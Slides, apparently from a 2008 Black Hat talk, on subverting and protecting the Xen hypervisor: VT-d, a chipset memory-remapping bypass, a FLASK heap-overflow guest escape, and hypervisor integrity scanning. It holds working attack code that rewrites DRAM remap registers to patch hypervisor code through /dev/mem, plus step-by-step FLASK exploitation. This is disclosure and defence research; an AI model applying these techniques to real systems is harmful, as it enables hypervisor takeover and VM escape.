# Preventing and Detecting Xen Hypervisor Subversions

Joanna Rutkowska & Rafał Wojtczuk, Invisible Things Lab

Black Hat USA 2008, August 7th, Las Vegas, NV

### Xen Owning Trilogy

**Part Two** 

Previously on Xen Owning Trilogy...

# Part I: "Subverting the Xen Hypervisor" by Rafal Wojtczuk (Invisible Things Lab)

- Hypervisor attacks via DMA
  - TG3 network card "manual" attack
  - Generic attack using disk controller
- "Xen Loadable Modules" framework :)
- Hypervisor backdooring
  - "DR" backdoor
  - "Foreign" backdoor

Now, in this part...

1. **Protecting** the (Xen) hypervisor
2. ... and how the protection fails
3. Checking (Xen) hypervisor integrity
4. ... and challenges with integrity scanning



## Dealing with DMA attacks



Xen and VT-d



```
static int intel_iommu_domain_init(struct domain *d)
{
    /* ... */
    if ( d->domain_id == 0 )
    {
        extern int xen_in_range(paddr_t start, paddr_t end);
        extern int tboot_in_range(paddr_t start, paddr_t end);

        /* Map every page 1:1 for Dom0, except pages used by Xen and tboot. */
        for ( i = 0; i < max_page; i++ )
        {
            if ( xen_in_range(i << PAGE_SHIFT_4K, (i + 1) << PAGE_SHIFT_4K) ||
                 tboot_in_range(i << PAGE_SHIFT_4K, (i + 1) << PAGE_SHIFT_4K) )
                continue;
            iommu_map_page(d, i, i);
        }
        setup_dom0_devices(d);
        setup_dom0_rmrr(d);
        iommu_flush_all();
    }
    /* ... */
    return 0;
}
```
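The effect of the loop above can be sketched in plain C: every page frame gets a 1:1 mapping unless it overlaps a protected range. The `protected_range` type, the `in_range` helper and the example addresses are assumptions made for illustration; they are not Xen's implementation of `xen_in_range()` or `tboot_in_range()`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SHIFT_4K 12

/* Hypothetical description of a region that devices must never reach. */
struct protected_range {
    uint64_t start;  /* inclusive physical address */
    uint64_t end;    /* exclusive physical address */
};

/* Nonzero if [start, end) overlaps the protected range. */
static int in_range(const struct protected_range *r,
                    uint64_t start, uint64_t end)
{
    return start < r->end && end > r->start;
}

/*
 * Walk page frames 0..max_page-1 and record which ones would be
 * identity-mapped: mapped[i] is 1 if mapped, 0 if skipped.
 * Returns the number of mapped frames.
 */
static size_t build_identity_map(const struct protected_range *ranges,
                                 size_t nranges, uint64_t max_page,
                                 unsigned char *mapped)
{
    size_t count = 0;

    assert(mapped != NULL);
    for (uint64_t i = 0; i < max_page; i++) {
        uint64_t start = i << PAGE_SHIFT_4K;
        uint64_t end = (i + 1) << PAGE_SHIFT_4K;
        int skip = 0;

        for (size_t r = 0; r < nranges; r++)
            if (in_range(&ranges[r], start, end))
                skip = 1;

        mapped[i] = (unsigned char)!skip;
        count += (size_t)!skip;
    }
    return count;
}
```

A device assigned to Dom0 can then only DMA into frames marked as mapped; the frames holding the hypervisor are simply absent from its view.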

Rafal's DMA attack (speech #1) will not work on Xen 3.3 running on Q35 chipset!



- Intel Core 2 Duo/Quad
- Up to 8GB RAM
- TPM 1.2
- Q35 Express chipset
- VT-d (IOMMU)

Intel DQ35JO motherboard: First IOMMU for desktops! (available in shops since around October 2007)

[Terminal screenshot: `root@q35`, working directory `~/xen-subvert-0.7.3`]

System hangs (VT-d prevented the attack)

So, how to get around?



Break ring3/ring0 separation?

Break VT-d protection?

None of them! :)





### DRAM Controller Registers (D0:F0)

The DRAM Controller registers are in Device 0 (D0), Function 0 (F0).

Warning: Address locations that are not listed are considered Intel Reserved register locations. Reads to Reserved registers may return non-zero values. Writes to reserved locations may cause system failures.

Registers that are defined in the PCI specification but not implemented in this component are not listed; reserved/unimplemented space is not documented as such in this summary.

Registers highlighted on the slide: REMAPBASE (offset 0x98) and REMAPLIMIT (offset 0x9a).

Table 5-1. DRAM Controller Register Address (excerpt)

| Address Offset | Register Symbol | Register Name                              | Default Value           | Access               |
|----------------|-----------------|--------------------------------------------|-------------------------|----------------------|
| 00-01h         | VID             | Vendor Identification                      | 8086h                   | RO                   |
| 02-03h         | DID             | Device Identification                      | 29C0h                   | RO                   |
| 04-05h         | PCICMD          | PCI Command                                | 0006h                   | RO, RW               |
| 06-07h         | PCISTS          | PCI Status                                 | 0090h                   | RWC, RO              |
| 08h            | RID             | Revision Identification                    | 00h                     | RO                   |
| 09-0Bh         | CC              | Class Code                                 | 060000h                 | RO                   |
| 0Dh            | MLT             | Master Latency Timer                       | 00h                     | RO                   |
| 0Eh            | HDR             | Header Type                                | 00h                     | RO                   |
| 2C-2Dh         | SVID            | Subsystem Vendor Identification            | 0000h                   | RWO                  |
| 2E-2Fh         | SID             | Subsystem Identification                   | 0000h                   | RWO                  |
| 34h            | CAPPTR          | Capabilities Pointer                       | E0h                     | RO                   |
| 40-47h         | PXPEPBAR        | PCI Express Port Base Address              | 0000000000000000h       | RW/L, RO             |
| 48-4Fh         | MCHBAR          | (G)MCH Memory Mapped Register Range Base   | 0000000000000000h       | RW/L, RO             |
| 52-53h         | GGC             | GMCH Graphics Control Register             | 0030h                   | RO, RW/L             |
| 54-57h         | DEVEN           | Device Enable                              | 000003DBh               | RO, RW/L             |
| 60-67h         | PCIEXBAR        | PCI Express Register Range Base Address    | 00000000E0000000h       | RO, RW/L, RW/L/K     |
| 68-6Fh         | DMIBAR          | Root Complex Register Range Base Address   | 0000000000000000h       | RO, RW/L             |
| 90h            | PAM0            | Programmable Attribute Map 0               | 00h                     | RO, RW/L             |
| 91h            | PAM1            | Programmable Attribute Map 1               | 00h                     | RO, RW/L             |
| 92h            | PAM2            | Programmable Attribute Map 2               | 00h                     | RO, RW/L             |
| 93h            | PAM3            | Programmable Attribute Map 3               | 00h                     | RO, RW/L             |
| 94h            | PAM4            | Programmable Attribute Map 4               | 00h                     | RO, RW/L             |
| 95h            | PAM5            | Programmable Attribute Map 5               | 00h                     | RO, RW/L             |
| 96h            | PAM6            | Programmable Attribute Map 6               | 00h                     | RO, RW/L             |
| 97h            | LAC             | Legacy Access Control                      | 00h                     | RW/L, RO, RW         |
| 98-99h         | REMAPBASE       | Remap Base Address Register                | 03FFh                   | RO, RW/L             |
| 9A-9Bh         | REMAPLIMIT      | Remap Limit Address Register               | 0000h                   | RO, RW/L             |
| 9Dh            | SMRAM           | System Management RAM Control              | 02h                     | RO, RW/L, RW, RW/L/K |
| 9Eh            | ESMRAMC         | Extended System Management RAM Control     | 38h                     | RW/L, RWC, RO        |
| A0-A1h         | TOM             | Top of Memory                              | 0001h                   | RO, RW/L             |
| A2-A3h         | TOUUD           | Top of Upper Usable DRAM                   | 0000h                   | RW/L                 |
| A4-A7h         | GBSM            | Graphics Base of Stolen Memory             | 00000000h               | RW/L, RO             |
| A8-ABh         | BGSM            | Base of GTT Stolen Memory                  | 00000000h               | RW/L, RO             |
| AC-AFh         | TSEGMB          | TSEG Memory Base                           | 00000000h               | RW/L, RO             |
| B0-B1h         | TOLUD           | Top of Low Usable DRAM                     | 0010h                   | RW/L, RO             |
| C8-C9h         | ERRSTS          | Error Status                               | 0000h                   | RO, RWC/S            |
| CA-CBh         | ERRCMD          | Error Command                              | 0000h                   | RO, RW               |
| CC-CDh         | SMICMD          | SMI Command                                | 0000h                   | RO, RW               |
| DC-DFh         | SKPD            | Scratchpad Data                            | 00000000h               | RW                   |
| E0-EAh         | CAPID0          | Capability Identifier                      | 00000100000000010B0009h | RO                   |
Memory Reclaiming



Applying this to Xen...



```
#define DO_NI_HYPERCALL_PA 0x7c10bd20

/* Split the target physical address into a 64 KB-aligned area and an offset. */
u64 target_phys_area = DO_NI_HYPERCALL_PA & ~(0x10000-1);
u64 target_phys_area_off = DO_NI_HYPERCALL_PA & (0x10000-1);

new_remap_base = 0x40;
new_remap_limit = 0x60;

reclaim_base = (u64)new_remap_base << 26;
reclaim_limit = ((u64)new_remap_limit << 26) + 0x3fffffff;
reclaim_sz = reclaim_limit - reclaim_base;
reclaim_mapped_to = 0xffffffff - reclaim_sz;
reclaim_off = target_phys_area - reclaim_mapped_to;

/* Reprogram the remapping registers of the DRAM controller. */
pci_write_word (dev, TOUUD_OFFSET, (new_remap_limit+1)<<6);
pci_write_word (dev, REMAP_BASE_OFFSET, new_remap_base);
pci_write_word (dev, REMAP_LIMIT_OFFSET, new_remap_limit);

/* Access the remapped range through /dev/mem and copy the code in. */
fdmem = open ("/dev/mem", O_RDWR);
memmap = mmap (..., fdmem, reclaim_base + reclaim_off);
for (i = 0; i < sizeof (jmp_rdi_code); i++)
    *((unsigned char*)memmap + target_phys_area_off + i) =
        jmp_rdi_code[i];
munmap (memmap, BUF_SIZE);
close (fdmem);
```

Demo: modifying the Xen 3.3 hypervisor from Dom0




# This attack can also be used to modify the SMM handler on the fly, without a reboot!

So, whose fault is it?

### Xen's fault?

- Allowing Dom0/Driver domains to access some chipset registers might be needed for some reasons... (Really?)
- But Xen cannot know everything about the chipset registers and features!

### Chipset's fault?

- Maybe chipset should do some basic validation before remapping...
- E.g.: ensure the remapping only applies to the <TOLUD, 4GB> window. And make TOLUD lockable.
- But...

### **BIOS's fault?**

- But Q35 provides a locking mechanism (SM\_lock) that is supposed to lock down the remapping registers.
- Intel told us that using this lock mechanism is recommended in Intel's BIOS Specification (\*)
- So, this seems to be the BIOS writer's fault in the end...

<sup>(\*)</sup>This document is available only to Intel partners (i.e. BIOS vendors).

### Related attacks

- Loic Duflot (2006): jump to SMM and then to the kernel from there (against OpenBSD securelevel). Now prevented by most BIOSes (thanks to the D\_LCK bit being set).
- Sun Bing (2007): exploit the TOP\_SWAP feature of some Intel chipsets to load malicious code before the BIOS locks the SMM, and so get your code into SMM. But this requires a reboot. Now prevented by BIOSes setting the BILD lock.





# "Domain 0" Disaggregation

Driver domains







Advantage: compromise of a driver != Dom0 access

Stub domains



Usermode process that runs as root in Dom0 (Device Virtualization Model)



Now: qemu compromise != Dom0 compromise

PyGRUB vs. PVGRUB



PyGRUB: runs in Dom0 with root privileges and processes the PV domain image (untrusted)



Xen vs. competition?

|                                                                     | Xen 3.3                              | Hyper-V (**)                                                                  | ESX                                  |
|---------------------------------------------------------------------|--------------------------------------|-------------------------------------------------------------------------------|--------------------------------------|
| IOMMU/VT-d support?                                                 | Yes                                  | No                                                                            | ?                                    |
| Hypervisor protected from the Admin Domain (including DMA attacks)? | Yes                                  | No                                                                            | ?                                    |
| Driver domains?                                                     | Yes (drivers in unprivileged domain) | No<br>(drivers in the root domain)                                            | No?  Drivers in the hypervisor?! (*) |
| I/O Emulator placement?<br>(Device Virtualization)                  | Unprivileged Domain ("stub domains") | Unprivileged process (vmwp.exe running as NETWORK_SERVICE in the root domain) | ?                                    |
| Trusted Boot support?<br>(DRTM/SRTM)                                | Yes (Xen tboot: DRTM via Intel TXT)  | No                                                                            | ?                                    |

<sup>(\*)</sup> based on VMware's presentation by Oded Horovitz at CanSecWest, March 2008 (slide #3)

<sup>(\*\*)</sup> based on the information provided by Brandon Baker (Microsoft) via email, July 2008

Ok, so does it really work?

Yes! No doubt it's the way to go!

Xen is well done!

but...

Overflows in hypervisor: 0

... until Rafal looked at it :)

The FLASK bug

What is FLASK?

## FLASK

- One of the implementations of XSM
- XSM = Xen Security Modules
- XSM is supposed to provide fine-grained control over security decisions
- XSM is based on LSM (Linux Security Modules)



## FLASK is not compiled into Xen by default

```
# Enable XSM security module. Enabling XSM requires selection of an
# XSM security module (FLASK_ENABLE or ACM_SECURITY).
XSM_ENABLE ?= n
FLASK_ENABLE ?= n
ACM_SECURITY ?= n
```

Ok, so where are the bugs?

```
/* buf and size are passed as hypercall arguments */
static int flask_security_user(char *buf, int size)
{
    char *page = NULL;
    char *con, *user, *ptr;
    u32 sid, *sids;
    int length;
    char *newcon;
    int i, rc;
    u32 len, nsids;

    length = domain_has_security(current->domain, SECURITY__COMPUTE_USER);
    if ( length )
        return length;

    length = -ENOMEM;
    con = xmalloc_array(char, size+1);
    if ( !con )
        return length;
    memset(con, 0, size+1);

    user = xmalloc_array(char, size+1);
    if ( !user )
        goto out;
    memset(user, 0, size+1);

    length = -ENOMEM;
    /* page buffer is always 4096 bytes big! */
    page = xmalloc_bytes(PAGE_SIZE);
    if ( !page )
        goto out2;
    memset(page, 0, PAGE_SIZE);

    length = -EFAULT;
    if ( copy_from_user(page, buf, size) )
        goto out2;

    length = -EINVAL;
    if ( sscanf(page, "%s %s", con, user) != 2 )
        goto out2;

    length = security_context_to_sid(con, strlen(con)+1, &sid);
    if ( length < 0 )
        goto out2;
    /* ... */
}
```

```
/* buf and size are passed as hypercall arguments */
static int flask_security_relabel(char *buf, int size)
{
    char *scon, *tcon;
    u32 ssid, tsid, newsid;
    u16 tclass;
    int length;
    char *newcon;
    u32 len;

    length = domain_has_security(current->domain, SECURITY__COMPUTE_RELABEL);
    if ( length )
        return length;

    length = -ENOMEM;
    scon = xmalloc_array(char, size+1);
    if ( !scon )
        return length;
    memset(scon, 0, size+1);

    tcon = xmalloc_array(char, size+1);
    if ( !tcon )
        goto out;
    memset(tcon, 0, size+1);

    length = -EINVAL;
    /* Yes this is sscanf()! Welcome back 90's! */
    if ( sscanf(buf, "%s %s %hu", scon, tcon, &tclass) != 3 )
        goto out2;

    length = security_context_to_sid(scon, strlen(scon)+1, &ssid);
    if ( length < 0 )
        goto out2;
    length = security_context_to_sid(tcon, strlen(tcon)+1, &tsid);
    if ( length < 0 )
        goto out2;

    length = security_change_sid(ssid, tsid, tclass, &newsid);
    if ( length < 0 )
        goto out2;

    length = security_sid_to_context(newsid, &newcon, &len);
    if ( length < 0 )
        goto out2;
    /* ... */
}
```
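Both listings trust a caller-supplied `size` and parse with an unbounded `%s`. A minimal user-space sketch of the defensive pattern follows: reject sizes that do not fit the fixed staging page, and give `sscanf()` explicit field widths. This is an illustration only, not the actual Xen patch; `parse_con_user` is a hypothetical name, and `memcpy()` stands in for `copy_from_user()`.

```c
#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAGE_SIZE 4096

/*
 * Hypothetical helper: parse "<con> <user>" from an untrusted buffer of
 * `size` bytes. Returns 0 and hands *con_out / *user_out to the caller
 * on success, or a negative errno value on failure.
 */
static int parse_con_user(const char *buf, size_t size,
                          char **con_out, char **user_out)
{
    char fmt[64];
    char *page = NULL, *con = NULL, *user = NULL;
    int rc = -EINVAL;

    /* Reject anything that does not fit the fixed-size staging page. */
    if (size == 0 || size >= PAGE_SIZE)
        return rc;

    rc = -ENOMEM;
    page = calloc(1, PAGE_SIZE);
    con = calloc(1, size + 1);
    user = calloc(1, size + 1);
    if (!page || !con || !user)
        goto fail;

    memcpy(page, buf, size);     /* stands in for copy_from_user() */
    assert(page[size] == '\0');  /* zeroed page + bounded copy stay terminated */

    /* Build "%<size>s %<size>s" so that each token is width-limited. */
    snprintf(fmt, sizeof(fmt), "%%%zus %%%zus", size, size);

    rc = -EINVAL;
    if (sscanf(page, fmt, con, user) != 2)
        goto fail;

    free(page);
    *con_out = con;
    *user_out = user;
    return 0;

fail:
    free(page);
    free(con);
    free(user);
    return rc;
}
```

With this shape, a request such as `(buf, 8192)` is refused before any copy takes place, so the staging page cannot be overrun.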

So, how do we exploit it?

```
struct xmalloc_hdr
{
    size_t size;
    struct list_head freelist;
} __cacheline_aligned;

struct list_head {
    struct list_head *next, *prev;
};
```

Step 1: flask\_user (buf, 8192)

We set: buf[8192-hdr\_sz] = 999. Then buf overwrites page... and the user buffer's xmalloc\_hdr size field gets a new value!

[Figure: heap layout, with labels: the *user* buffer (8k), its xmalloc\_hdr (size = 999), the page buffer (4k), its xmalloc\_hdr; arrow marked "higher addresses"]

After freeing buf, xmalloc will put it on a list of small free chunks and use it for the next allocation of a small chunk!

"Small" chunks: chunks for buffers that are less than 4096 bytes

Step 2: flask\_relabel (buf, 8192)

[Figure: heap layout, with labels: the xenoprof buffer, its xmalloc\_hdr, the *tcon* buffer (8k), its xmalloc\_hdr]

... so if we write addr there, then... we will get (long) 0 written at addr :)

Step 3: freeing the xenoprof buffer

xenoprof\_enable\_virq();

## What we got? A write-zero-to-arbitrary-address primitive

## What to overwrite with zero? How about the upper half of some hypercall address? This way we will redirect it to usermode!

Demo: Escape from DomU using the FLASK bug

```
[root@dom0 ~]#

    xen_printk("All your hypervisor are belong to us !\n");
    return 0xaabbccdd;

[root@some_domU flask-bo]#
```

#### The bug has been patched on July 21st, 2008:

changeset: 18096:fa66b33f975a

user: Keir Fraser <keir.fraser@citrix.com>

date: Mon Jul 21 09:41:36 2008 +0100

summary: [XSM][FLASK] Argument handling bugs in XSM:FLASK

BTW, note the lack of the "security" word in the patch description ;)



Can we get rid of all bugs in the hypervisor?

Xen hypervisor complexity

#### Lines-of-Code in Xen 3 hypervisors in ring 0 (\*)



<sup>(\*)</sup> Calculated using: find xen/ -name "\*.[chsS]" -print0 | xargs -0 cat | wc -l

<sup>(\*\*)</sup> Retrieved from the Xen unstable mercurial on July 24th, 2008

Trend a bit disturbing...

Xen hypervisor grows over time, instead of shrinking :(



<sup>(\*)</sup> based on the information provided by Brandon Baker (Microsoft) via email, July 2008

Lessons learnt

- Hypervisors are not special!
- Hypervisor can be compromised too!
- Computer systems are complex!
- Prevention is not enough!

Prevention not enough!



Ensuring Hypervisor Integrity


### Integrity Scanning

Ensure the hypervisor's code & data are intact

Ensure no untrusted code in hypervisor

[Figure: hypervisor memory, shown as one code region followed by several data regions]

Code is easy to verify...

... but data is not!



Executable page with untrusted code



1. Read hypervisor's CR3
2. Parse Page Tables and find all pages that are marked as executable and supervisor in their PTEs
3. Verify the hashes of those code pages remain the same as during the initialization phase
4. Also: ensure some system wide registers were not modified (CR4, CR0, etc)
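Steps 2 and 3 above can be sketched over a simplified model in which each leaf PTE is paired with the page it maps. The flag positions are the x86-64 ones (Present = bit 0, U/S = bit 2, NX = bit 63). Everything else is an assumption made for illustration: the `mapped_page` type, the function names, and FNV-1a as a stand-in for a real cryptographic hash. Real page-table walking and the register checks of step 4 are left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PTE_PRESENT (1ULL << 0)
#define PTE_USER    (1ULL << 2)   /* U/S: set means user-accessible */
#define PTE_NX      (1ULL << 63)  /* set means not executable */
#define PAGE_BYTES  4096

/* Simplified model: one leaf PTE plus the page contents it maps. */
struct mapped_page {
    uint64_t pte;
    const unsigned char *data;    /* PAGE_BYTES bytes */
};

/* FNV-1a, used here only as a stand-in for a cryptographic hash. */
static uint64_t page_hash(const unsigned char *p)
{
    uint64_t h = 0xcbf29ce484222325ULL;
    for (size_t i = 0; i < PAGE_BYTES; i++) {
        h ^= p[i];
        h *= 0x100000001b3ULL;
    }
    return h;
}

/* Step 2: present, supervisor-only, and executable (NX clear). */
static int is_supervisor_code(uint64_t pte)
{
    return (pte & PTE_PRESENT) && !(pte & PTE_USER) && !(pte & PTE_NX);
}

/*
 * Step 3: hash every supervisor code page and compare with the baseline
 * recorded at initialization. Returns the number of mismatching pages,
 * or -1 if the number of code pages differs from the baseline.
 */
static int scan_code_pages(const struct mapped_page *pages, size_t npages,
                           const uint64_t *baseline, size_t nbaseline)
{
    size_t seen = 0;
    int mismatches = 0;

    assert(pages != NULL);
    for (size_t i = 0; i < npages; i++) {
        if (!is_supervisor_code(pages[i].pte))
            continue;
        if (seen >= nbaseline)
            return -1;            /* a new executable page appeared */
        if (page_hash(pages[i].data) != baseline[seen])
            mismatches++;
        seen++;
    }
    return seen == nbaseline ? mismatches : -1;
}
```

The scan treats an unexpected executable supervisor page as a failure in its own right, which is why the NX requirement matters: without it, data pages would also have to be hashed.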

To make it work...

- Hypervisor must strictly apply the NX bit (only code pages do not have NX bit set)
- No self-modifying code in the hypervisor
- Hypervisor's code not pageable

## Xen hypervisor can meet those requirements with just a few cosmetic workarounds

Hyper-V already meets all those requirements! (Brandon Baker, Microsoft)

... but, there are traps!

## Trap #1

Rootkit might keep its code in the usermode pages: the CPU would still execute them from ring0...



CPU should refuse to execute code from usermode pages when running in ring0
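One way to read this proposal is as an extra condition on instruction fetches. The sketch below models it over a single leaf PTE. The `fetch_allowed` function and its `nx_plus` switch are hypothetical names for this example, and the model ignores multi-level paging and control-register state.

```c
#include <assert.h>
#include <stdint.h>

#define PTE_PRESENT (1ULL << 0)
#define PTE_USER    (1ULL << 2)   /* U/S: set means user-accessible */
#define PTE_NX      (1ULL << 63)  /* set means not executable */

/* Returns 1 if an instruction fetch is allowed, 0 if it should fault. */
static int fetch_allowed(unsigned cpl, uint64_t pte, int nx_plus)
{
    assert(cpl <= 3);
    if (!(pte & PTE_PRESENT) || (pte & PTE_NX))
        return 0;                 /* not mapped, or marked non-executable */
    if (cpl == 3 && !(pte & PTE_USER))
        return 0;                 /* ring3 cannot run supervisor pages */
    if (nx_plus && cpl == 0 && (pte & PTE_USER))
        return 0;                 /* proposed: ring0 refuses usermode pages */
    return 1;
}
```

With `nx_plus` off, a ring0 fetch from a user page succeeds, which is exactly the gap Trap #1 describes.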

Marketing name: "NX+" or "XD+" :)

Talks with Intel in progress...

## Trap #2

Code-less backdoors! 'jmp rdi' or more advanced ret-into-libc stuff (don't think ret-into-libc is not possible on x64!)



Anybody who can issue INT XX can now get their code executed in ring0 in the hypervisor!

There are only a few structures (function pointers) that could be used to plant such a backdoor!

This is few compared with the number we would face if we were to check all possible function pointers.

Examples for Xen: IDT, hypercall\_table, exception\_table

Hypervisor should provide a sanity function that would be part of the code (static path) that would check those few structures.

HyperGuard doesn't need to know about those few structures.
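One possible shape for such a sanity function is a comparison of each pointer table against a known-good copy recorded at initialization. A plain "does it point into hypervisor code?" range check is not used here, because a pointer redirected to an instruction sequence that already exists in hypervisor code would still pass it. The function name and the example values in the usage note are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Compare a table of function pointers (e.g. a hypercall table) with the
 * copy recorded at initialization. Returns the index of the first entry
 * that differs, or -1 if the table is intact.
 */
static long first_modified_entry(const uint64_t *table,
                                 const uint64_t *known_good, size_t n)
{
    assert(table != NULL && known_good != NULL);
    for (size_t i = 0; i < n; i++)
        if (table[i] != known_good[i])
            return (long)i;
    return -1;
}
```

An entry whose upper 32 bits were zeroed, for example 0xffff828c80101000 turned into 0x80101000, no longer matches its recorded value and is reported by index.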

## Trap #3

We only check integrity at the very moment... when we check integrity... What happens in between? When should we do the checks?



#### Solution?

Oh, come on, we need to keep a few aces up our sleeves ;)

Introducing HyperGuard...

## HyperGuard is a project done in cooperation with Phoenix Technologies

#### Phoenix BIOS



Why in SMM?

|                                      | SMM<br>handler                                                   | PCI device                                      | Chipset                         |
|--------------------------------------|------------------------------------------------------------------|-------------------------------------------------|---------------------------------|
| tamper<br>proof?                     | should be :)<br>(depends very much on the BIOS, see the Q35 bug) | yes                                             | yes                             |
| access to CPU state (e.g. registers) | yes                                                              | no                                              | no                              |
| reliable<br>access to<br>DRAM        | yes                                                              | no<br>(e.g. IOMMU, other<br>redirecting tricks) | yes<br>(can deal with<br>IOMMU) |

Combining chipset-based scanner (see Yuriy Bulygin's presentation) with SMM-based scanner seems like a good mixture...



## CHIPSET BASED APPROACH TO DETECT VIRTUALIZATION MALWARE a.k.a. DeepWatch

Yuriy Bulygin

Joint work with David Samyde

Security Center of Excellence / PSIRT @ Intel Corporation



Combining SMM + chipset integrity scanning

|                                      | SMM<br>handler | PCI<br>device | Chipset | SMM +<br>chipset |
|--------------------------------------|----------------|---------------|---------|------------------|
| tamper<br>proof?                     | should be :)   | yes           | yes     | yes              |
| access to CPU state (e.g. registers) | yes            | no            | no      | yes              |
| reliable<br>access to<br>DRAM        | yes            | no            | yes     | yes              |

## Additionally, the chipset could provide a fast hash calculation service to HyperGuard

But we should keep the chipset based scanner as simple as possible!

The deeper we are the simpler we are!

Talks with Intel in progress...

HyperGuard might also be used in the future to verify integrity of normal OS kernels (e.g. Windows or Linux)

## Slides available at: http://invisiblethingslab.com/bh08

Demos and code will be available from the same address after Intel releases the patch.

## Credits

 Brandon Baker (Microsoft), for providing lots of information about Hyper-V (that we haven't played with ourselves yet)

### Thank you!

Xen Owning Trilogy to be continued in:

"Bluepilling The Xen Hypervisor"

by Invisible Things Lab